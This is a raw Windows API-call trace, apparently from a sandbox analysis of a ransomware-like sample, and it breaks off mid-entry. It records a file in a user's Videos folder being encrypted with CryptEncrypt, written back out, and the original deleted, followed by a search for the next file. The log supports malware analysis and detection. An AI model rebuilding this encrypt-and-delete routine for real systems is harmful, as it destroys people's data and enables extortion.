PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0098.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0098.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0098.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0098.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0098.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0098.022] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0098.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0098.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0098.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0098.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0098.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0098.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0098.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0098.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0098.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0098.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0098.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0098.070] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0098.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0098.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0098.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0098.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0098.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca448 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0098.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0098.071] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0098.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0098.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0098.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0098.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0098.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0098.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0098.072] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0098.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0098.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0098.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0098.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0098.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0098.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0098.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0098.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0098.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0098.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0098.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0098.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0098.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0098.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0098.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0098.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0098.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0098.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0098.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0098.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0098.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0098.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0098.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0098.073] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0098.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0098.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0098.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0098.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0098.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0098.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0098.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0098.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0098.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0098.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0098.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0098.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0098.073] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0098.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0098.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0098.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0098.073] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0098.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0098.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0098.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0098.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0098.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0098.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0098.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0098.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0098.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0098.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0098.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0098.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0098.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0098.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0098.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0098.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0098.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0098.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0098.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0098.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0098.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0098.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0098.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0098.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0098.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0098.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0098.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0098.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0098.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0098.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0098.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0098.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0098.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0098.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0098.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0098.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0098.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0098.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0098.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0098.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0098.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0098.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0098.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0098.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0098.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0098.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0098.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0098.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0098.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0098.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0098.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0098.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d88 [0098.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0098.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0098.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0098.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0098.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0098.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0098.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0098.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0098.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0098.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0098.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0098.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0098.076] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0098.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0098.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0098.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0098.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ec8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0098.077] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, pbData=0x43e27d0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e27d0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0098.077] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0098.077] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.077] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0098.077] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.078] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca868, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0098.078] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x9e42, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x9e50) returned 1 [0098.078] CharLowerBuffW (in: lpsz="byte[40529]", cchLength=0xb | out: lpsz="byte[40529]") returned 0xb [0098.080] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.080] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca868, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0098.081] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4533b00*, pdwDataLen=0x144e538*=0x9e42, dwBufLen=0x9e50 | out: pbData=0x4533b00*, pdwDataLen=0x144e538*=0x9e50) returned 1 [0098.081] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0098.081] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0098.081] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.081] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x9e50, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0x9e50, lpOverlapped=0x0) returned 1 [0098.084] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0098.149] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.149] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0098.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca658, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0098.149] CryptDestroyKey (hKey=0x41ac140) returned 1 [0098.150] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0098.150] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0098.150] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.150] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0098.150] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0098.150] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.150] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.150] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0098.150] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0098.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0098.150] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0098.150] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.150] FreeLibrary (hLibModule=0x756e0000) returned 1 [0098.150] CloseHandle (hObject=0x258) returned 1 [0098.151] CloseHandle (hObject=0x298) returned 1 [0098.153] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9ua4aLpWeNEQZn vUIUd.mkv", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9ua4aLpWeNEQZn vUIUd.mkv", lpFilePart=0x0) returned 0x3e [0098.153] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9ua4aLpWeNEQZn vUIUd.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\9ua4alpweneqzn vuiud.mkv")) returned 0x20 [0098.153] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9ua4aLpWeNEQZn vUIUd.mkv", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e54f3e0, ftCreationTime.dwHighDateTime=0x1d5e735, ftLastAccessTime.dwLowDateTime=0xdcb950a0, ftLastAccessTime.dwHighDateTime=0x1d5eb24, ftLastWriteTime.dwLowDateTime=0xdcb950a0, ftLastWriteTime.dwHighDateTime=0x1d5eb24, nFileSizeHigh=0x0, nFileSizeLow=0x9e42, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="9ua4aLpWeNEQZn vUIUd.mkv", cAlternateFileName="9UA4AL~1.MKV")) returned 0x41ac500 [0098.154] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9ua4aLpWeNEQZn vUIUd.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\9ua4alpweneqzn vuiud.mkv")) returned 1 [0098.213] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e54f3e0, ftCreationTime.dwHighDateTime=0x1d5e735, 